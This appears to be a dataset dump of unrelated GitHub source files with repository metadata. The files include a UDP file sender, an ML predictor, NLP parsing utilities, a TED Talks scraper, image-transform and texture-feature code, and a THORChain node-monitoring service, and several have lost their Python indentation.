f8ff5e95cbb81328e66515c2ede9d6777f7a618f
|
refs/heads/main
| 2023-01-10T21:53:26.589522
| 2020-11-05T19:38:10
| 2020-11-05T19:38:10
| 310,399,546
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 410
|
py
|
#!/usr/bin/env python
from socket import *
import sys,time
s = socket(AF_INET,SOCK_DGRAM)
host = '10.20.1.8'
port = 8000
buf =20480
file_name=sys.argv[1]
s.sendto((file_name).encode(),(host,port))
f=open(file_name,"rb")
data = f.read(buf)
while (data):
if(s.sendto(data,(host,port))):
print("sending ...")
data = f.read(buf)
#time.sleep(0.1)
s.close()
f.close()
|
[
"noreply@github.com"
] |
TaglioUltimate.noreply@github.com
|
c01d8aa9ceb247202bc06ef202c21b2946e44d06
|
7aa6d0d2e40adac32d06035b3c111746130176c4
|
/QMAX_EAGLE_1500_V_3.0/code_releative/exe.py
|
0d7c1f29d7ba25c2db47c3f5989e6a2e8858d5b0
|
[] |
no_license
|
vimalv-AI/Vimal
|
861dad4c66ea2f875e55a5d67b7bd9f80a753914
|
e6d792bfc0e66555dfcf2217075c3b0dc8b886ea
|
refs/heads/master
| 2021-01-07T07:36:49.094701
| 2020-03-29T14:12:32
| 2020-03-29T14:12:32
| 241,618,603
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 599
|
py
|
import pickle
import glob
import pandas as pd
from natsort import natsorted,ns
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
loaded_model = pickle.load(open('trained_model/eagle_model.yml', 'rb'))
file = natsorted(glob.glob("input_data/*.txt"))
for new in file:
new=pd.read_csv(new,"r",header=None)
Trans=new.T
to_predict=Trans.iloc[:,:].values
y_pred = loaded_model.predict(to_predict)
if y_pred == 1:
print ("The Nut is Tight : ",y_pred)
else:
print ("The Nut is lose : ",y_pred)
|
[
"vsvimal5420@gmail.com"
] |
vsvimal5420@gmail.com
|
62be46a97febe64faaa0c49b7f69414526b062c8
|
5a7aeb54d86a525e1f922d928c4a103c78f4ff88
|
/cli/cli.py
|
a96a07d1e3b86be8067688bc3ef32378cfe6fbbd
|
[] |
no_license
|
Esty-Hirshman/DNA-project
|
a575787fbc1c7f90b58f4effa198c8fae8b2ebb7
|
579e27e431003ab95469e65eac0a8d10fda8ba69
|
refs/heads/main
| 2023-08-03T02:10:40.901565
| 2021-09-12T10:04:31
| 2021-09-12T10:04:31
| 405,606,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
class CLI:
def __init__(self, prompt):
self.__prompt = prompt
def get_prompt(self):
return self.__prompt
def set_prompt(self, new_prompt):
self.__prompt = new_prompt
def run(self, *args):
raise
|
[
"esty3975@gmail.com"
] |
esty3975@gmail.com
|
f9050427f8574da72fd6c8b067a42a35cdf01c8a
|
d968af7a1f2692667c703409ae6a5a0918592df2
|
/utils.py
|
f339662367600ee293164578c7d41842c9566b7b
|
[] |
no_license
|
cdg720/parsereranker
|
bf55672bdb76d2e356f8357d6aa6a82f0603dd5f
|
5a9af9427c3c3bbe2a065f9357b73fe934522ce4
|
refs/heads/master
| 2021-01-18T22:10:36.357836
| 2017-04-08T20:07:40
| 2017-04-08T20:07:40
| 87,035,213
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,950
|
py
|
import time
import numpy as np
def chop(data, eos):
new_data = []
sent = []
for w in data:
sent.append(w)
if w == eos:
new_data.append(sent)
sent = []
return new_data
def ptb_iterator(raw_data, batch_size, num_steps):
raw_data = np.array(raw_data, dtype=np.int32)
data_len = len(raw_data)
batch_len = data_len // batch_size
data = np.zeros([batch_size, batch_len], dtype=np.int32)
for i in range(batch_size):
data[i] = raw_data[batch_len * i:batch_len * (i + 1)]
epoch_size = (batch_len - 1) // num_steps
if epoch_size == 0:
raise ValueError("epoch_size == 0, decrease batch_size or num_steps")
for i in range(epoch_size):
x = data[:, i*num_steps:(i+1)*num_steps]
y = data[:, i*num_steps+1:(i+1)*num_steps+1]
yield (x, y)
def run_epoch(session, m, data, batch_size, num_steps,
eval_op=None, verbose=False):
"""Runs the model on the given data."""
epoch_size = ((len(data) // batch_size) - 1) // num_steps
start_time = time.time()
costs = 0.0
iters = 0
state = None
for step, (x, y) in enumerate(ptb_iterator(data, batch_size,
num_steps)):
fetches = {"cost": m.cost, "final_state": m.final_state}
if eval_op:
fetches["op"] = eval_op
feed_dict = {}
if state:
feed_dict[m.initial_state] = state
feed_dict[m.input_data] = x
feed_dict[m.targets] = y
feed_dict[m.length] = np.ones(x.shape[0], dtype=np.int) * x.shape[1]
stuff = session.run(fetches, feed_dict)
state = stuff["final_state"]
costs += np.sum(stuff['cost']) / batch_size
iters += num_steps
if verbose and step % (epoch_size // 10) == 10:
print '%.3f perplexity: %.3f speed: %.0f wps' % \
(step * 1.0 / epoch_size, np.exp(costs / iters),
iters * batch_size / (time.time() - start_time))
return np.exp(costs / iters)
def evaluate(session, m, nbest):
"""Runs the model on the given data."""
start_time = time.time()
gold, test, matched = 0, 0, 0
tree_num = 0
steps = 50
for trees, scores, indices in nbest:
costs = np.zeros(trees.shape[0])
state = None
num = (trees.shape[1] - 1) / steps
re = (trees.shape[1] - 1) % steps
if re != 0:
num += 1
start = 0
for i in xrange(num):
fetches = {"cost": m.cost, "final_state": m.final_state}
feed_dict = {}
if i > 0 and state:
feed_dict[m.initial_state] = state
shift = re if re > 0 and i == num - 1 else steps
feed_dict[m.input_data] = trees[:, start:start+shift]
feed_dict[m.targets] = trees[:,start+1:start+shift+1]
feed_dict[m.length] = np.ones(trees.shape[0], dtype=np.int) * shift
stuff = session.run(fetches, feed_dict)
costs += stuff["cost"]
state = stuff["final_state"]
start += shift
prev = 0
for i in indices:
am = np.argmin(costs[prev:i])
gold += scores[am+prev][0]
test += scores[am+prev][1]
matched += scores[am+prev][2]
tree_num += 1
prev = i
return 200. * matched / (gold + test)
def unkify(ws):
uk = 'unk'
sz = len(ws)-1
if ws[0].isupper():
uk = 'c' + uk
if ws[0].isdigit() and ws[sz].isdigit():
uk = uk + 'n'
elif sz <= 2:
pass
elif ws[sz-2:sz+1] == 'ing':
uk = uk + 'ing'
elif ws[sz-1:sz+1] == 'ed':
uk = uk + 'ed'
elif ws[sz-1:sz+1] == 'ly':
uk = uk + 'ly'
elif ws[sz] == 's':
uk = uk + 's'
elif ws[sz-2:sz+1] == 'est':
uk = uk + 'est'
elif ws[sz-1:sz+1] == 'er':
uk = uk + 'ER'
elif ws[sz-2:sz+1] == 'ion':
uk = uk + 'ion'
elif ws[sz-2:sz+1] == 'ory':
uk = uk + 'ory'
elif ws[0:2] == 'un':
uk = 'un' + uk
elif ws[sz-1:sz+1] == 'al':
uk = uk + 'al'
else:
for i in xrange(sz):
if ws[i] == '-':
uk = uk + '-'
break
elif ws[i] == '.':
uk = uk + '.'
break
return '<' + uk + '>'
|
[
"cdg720@gmail.com"
] |
cdg720@gmail.com
|
7ca8bcc022d2ae7195338dc961946fa8c0463027
|
b94fed184633700214c16c9b2187de4c01a65369
|
/task/ted_talk_crawler.py
|
5ad2009dbf95a63f5ca4220a894e1c5c9b47c3e6
|
[] |
no_license
|
Gold900/task_management
|
513ae9b12591ffaeb3fdeebb20934b5e339dc743
|
283494aa767b478f2abc8a5207a250279625f52c
|
refs/heads/master
| 2022-04-13T08:22:17.532514
| 2020-03-27T07:30:58
| 2020-03-27T07:30:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,411
|
py
|
import json
import requests
from bs4 import BeautifulSoup
class TedTalkCrawler:
def __init__(self):
pass
def get_params(self, data):
params = {}
if "sort" in data and data["sort"]:
params["sort"] = data["sort"]
if "topic" in data and data["topic"]:
params["topics[]"] = data["topic"]
return params
def get_headers(self, data):
headers = {}
headers["Content-Type"] = "application/json"
return headers
def main(self, data):
url = "https://www.ted.com/talks"
params = self.get_params(data)
resp = requests.get(url, params)
html = resp.text
soup = BeautifulSoup(html, "html.parser")
browse_res = soup.find(id="browse-results")
tlk_lnks = browse_res.find_all("div", {"class": "talk-link"})
final_res = [{"img": each.find("img")["src"], "speaker": each.find("h4").text,
"title": each.find_all("a", {"class": "ga-link"})[-1].text,
"link": each.find_all("a", {"class": "ga-link"})[-1]["href"],
"meta": each.find("div", {"class": "meta"}).text} for each in tlk_lnks]
json.dump(final_res, open("crawl_res.json", "w"), indent=4)
if __name__=='__main__':
data = {"topic": ["entertainment", "technology"], "sort": "newest"}
OBJ = TedTalkCrawler()
OBJ.main(data)
|
[
"sonaligupta1470@gmail.com"
] |
sonaligupta1470@gmail.com
|
5fa87f79b0f0900e01ca20332e9dd24c211ba119
|
3d23c178dd1d6738766e28e05a5c77162c2c35cb
|
/KIRANA123/asgi.py
|
5e62e94ca1245fe2da7fef9043dda2869baaf1de
|
[] |
no_license
|
giri2510/tryingcss
|
ec0b67c9f7c664e2749ec0dc502e3bda5cabc07b
|
d4fae361986dd20ca25beb682f432078fbe61edc
|
refs/heads/master
| 2022-12-18T16:29:50.987779
| 2020-10-07T07:57:18
| 2020-10-07T07:57:18
| 301,964,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for KIRANA123 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'KIRANA123.settings')
application = get_asgi_application()
|
[
"giriahire@gmail.com"
] |
giriahire@gmail.com
|
a2b8c2d58866868509724106c5b1821610bc1541
|
9e78a2864243b7e002a2ea38fa33834d55041a35
|
/mva/computer-vision-and-object-recognition/Finegrained-classification/code/data.py
|
fcd63e28751e8f0d9cd6f8b590f039a44d6ca9e5
|
[] |
no_license
|
ghassenBtb/projects-and-labs
|
31c1a1b8f1e157c98d5d4aff9831ac59c8e6942e
|
d3e9b7729fd35ee360a55fc2462aeef431a838dc
|
refs/heads/main
| 2023-02-04T19:31:12.892693
| 2020-12-28T21:53:55
| 2020-12-28T21:53:55
| 311,183,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 868
|
py
|
import zipfile
import os
import torchvision.transforms as transforms
class White_noise():
"""
Add a gaussian noise to image
"""
def __init__(self, level=0.1):
self.level = level
def __call__(self, img):
return img+torch.randn_like(img)*(self.level*np.random.rand())
data_transforms_pretrained = {
'train': transforms.Compose([
transforms.RandomResizedCrop(300),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(brightness=0.4),
transforms.Lambda(White_noise(level = 0.05)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize(300),
transforms.CenterCrop(300),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
|
[
"bettaieb.gha@gmail.com"
] |
bettaieb.gha@gmail.com
|
2165b6b232f25cdf32eb3707af8d62e27631b56c
|
88d636e8e2ebbafdbe008be4822d5baa8b9fdded
|
/hist.py
|
20e2eab1175c17f70fcc8f8721736097b42410ce
|
[] |
no_license
|
debadrita0/Mtech-Project
|
5d0558c69759703dbf5d2c5b775f8dc5179fbaf2
|
18ba0fdb0e8024512b49261e24b6da8e72832052
|
refs/heads/main
| 2023-06-19T05:30:40.332720
| 2021-07-15T16:04:08
| 2021-07-15T16:04:08
| 386,347,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 804
|
py
|
# import the necessary packages
from skimage import feature
import numpy as np
class LocalBinaryPatterns:
def __init__(self, numPoints, radius):
# store the number of points and radius
self.numPoints = numPoints
self.radius = radius
def describe(self, image, eps=1e-7):
# compute the Local Binary Pattern representation
# of the image, and then use the LBP representation
# to build the histogram of patterns
lbp = feature.local_binary_pattern(image, self.numPoints,
self.radius, method="uniform")
(hist, _) = np.histogram(lbp.ravel(),
bins=np.arange(0, self.numPoints + 3),
range=(0, self.numPoints + 2))
# normalize the histogram
hist = hist.astype("float")
hist /= (hist.sum() + eps)
# return the histogram of Local Binary Patterns
return hist
|
[
"noreply@github.com"
] |
debadrita0.noreply@github.com
|
3f814bc8ef0e2db3fea165db2b5f8cc82bed1135
|
fdf5e70bdaac78296a9af70d64a807f52326fda8
|
/bot/service/thorchain_network_service.py
|
39b6edd1de4c65bf6d80777241885de990d808d2
|
[
"MIT"
] |
permissive
|
Masternode24/thornode-telegram-bot
|
44784ad646933450a122e4a60639f517e2eb3636
|
5f73b882381548f45fc9e690c6e4845def9600b7
|
refs/heads/master
| 2023-04-12T12:32:18.862511
| 2021-04-23T13:22:39
| 2021-04-23T13:22:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,744
|
py
|
import random
from time import sleep
import aiohttp
import requests
from requests.exceptions import Timeout, ConnectionError, HTTPError
from constants.mock_values import thorchain_last_block_mock
from service.general_network_service import get_request_json
from constants.globals import *
from constants.node_ips import *
def get_node_accounts():
path = ":8080/nodeaccounts.json" if DEBUG else ":1317/thorchain/nodes"
return get_request_json_thorchain(url_path=path)
def get_node_status(node_ip=None):
status_path = {
"TESTNET": ":26657/status",
"CHAOSNET": ":27147/status"
}[NETWORK_TYPE]
return get_request_json_thorchain(url_path=status_path, node_ip=node_ip)
def get_latest_block_height(node_ip=None) -> int:
return int(get_node_status(node_ip)['result']['sync_info']['latest_block_height'])
def is_thorchain_catching_up(node_ip=None) -> bool:
return get_node_status(node_ip)['result']['sync_info']['catching_up']
def is_midgard_api_healthy(node_ip) -> bool:
try:
get_request_json_thorchain(url_path=":8080/v2/health", node_ip=node_ip)
except (Timeout, ConnectionError):
logger.warning(f"Timeout or Connection error with {node_ip}")
return False
except HTTPError as e:
logger.info(f"Error {e.errno} in 'is_midgard_api_healthy({node_ip}).")
return False
return True
def get_number_of_unconfirmed_transactions(node_ip) -> int:
unconfirmed_txs_path = {
"TESTNET": ":26657/num_unconfirmed_txs",
"CHAOSNET": ":27147/num_unconfirmed_txs"
}[NETWORK_TYPE]
return int(get_request_json_thorchain(url_path=unconfirmed_txs_path, node_ip=node_ip)['result']['total'])
def get_profit_roll_up_stats(node_address):
profit_rollup = get_request_json(url=THORCHAIN_ONCHAIN_API_URL + f"profit-roll-ups/{node_address}")
parsing_progress = get_request_json(url=THORCHAIN_ONCHAIN_API_URL + f"health")["parsing_progress"]
return profit_rollup, parsing_progress
def get_network_data(node_ip=None):
return get_request_json_thorchain(url_path=f":8080/v2/network", node_ip=node_ip)
def get_thorchain_network_constants(node_ip=None):
return get_request_json_thorchain(url_path=f":8080/v2/thorchain/constants")
def get_thorchain_blocks_per_year(node_ip=None):
constants = get_thorchain_network_constants()
return constants['int_64_values']['BlocksPerYear']
def get_thorchain_blocks_per_second():
return get_thorchain_blocks_per_year() / (365 * 24 * 60 * 60)
def get_thorchain_last_block(node_ip=None):
if DEBUG:
sleep(0.5)
last_block = thorchain_last_block_mock
else:
last_block = get_request_json_thorchain(url_path=f":8080/v2/thorchain/lastblock", node_ip=node_ip)
return last_block[0]['thorchain']
def get_asgard_json() -> dict:
path = ':8080/asgard.json' if DEBUG else f":1317/thorchain/vaults/asgard"
return get_request_json_thorchain(url_path=path)
def get_yggdrasil_json() -> dict:
path = ":8080/yggdrasil.json" if DEBUG else ":1317/thorchain/vaults/yggdrasil"
return get_request_json_thorchain(url_path=path)
def get_pool_addresses_from_any_node() -> dict:
path = ":8080/pool_addresses_1.json" if DEBUG else ":1317/thorchain/inbound_addresses"
return get_request_json_thorchain(path)
async def get_pool_addresses_from_node(node_ip: str):
async with aiohttp.ClientSession() as session:
async with session.get(
f'http://{node_ip}:1317/thorchain/inbound_addresses',
timeout=CONNECTION_TIMEOUT) as response:
if response.status != 200:
raise Exception(
f"Error while getting pool address. " +
"Endpoint responded with: {await resp.text()} \n"
"Code: ${str(resp.status)}")
return await response.json()
def get_request_json_thorchain(url_path: str, node_ip: str = None) -> dict:
if DEBUG:
node_ip = 'localhost'
if node_ip:
return get_request_json(url=f"http://{node_ip}{url_path}{REQUEST_POSTFIX}")
available_node_ips = requests.get(url=SEED_LIST_URL, timeout=CONNECTION_TIMEOUT).json()
random.shuffle(available_node_ips)
for random_node_ip in available_node_ips:
if not is_thorchain_catching_up(random_node_ip):
try:
return get_request_json(url=f"http://{random_node_ip}{url_path}{REQUEST_POSTFIX}")
except Exception:
continue
raise Exception("No seed node returned a valid response!")
def get_thornode_object_or_none(address):
nodes = get_node_accounts()
node = next(filter(lambda n: n['node_address'] == address, nodes), None)
return node
|
[
"noreply@github.com"
] |
Masternode24.noreply@github.com
|
018e4fcbdf2333c3be5a3027fabd3e0b7dbaaa70
|
1c664f387937daf5577f12a05e8201cbad6c2888
|
/env/share/glib-2.0/codegen/config.py
|
20f9cab400f824b6c99cede69fec7e5ac1d52b7e
|
[] |
no_license
|
AdityaApte02/NumpyAndPandas
|
8ddcb692919205ab0a66863e59735c5a86b49c2d
|
7eb41aae4fadb2b44888eca21d984c02e1beaea5
|
refs/heads/main
| 2023-07-14T18:58:00.619773
| 2021-08-26T08:54:39
| 2021-08-26T08:54:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 856
|
py
|
# -*- Mode: Python -*-
# GDBus - GLib D-Bus Library
#
# Copyright (C) 2008-2011 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General
# Public License along with this library; if not, see <http://www.gnu.org/licenses/>.
#
# Author: David Zeuthen <davidz@redhat.com>
VERSION = "2.66.1"
MAJOR_VERSION = 2
MINOR_VERSION = 66
|
[
"aditya02.apte@gmail.com"
] |
aditya02.apte@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.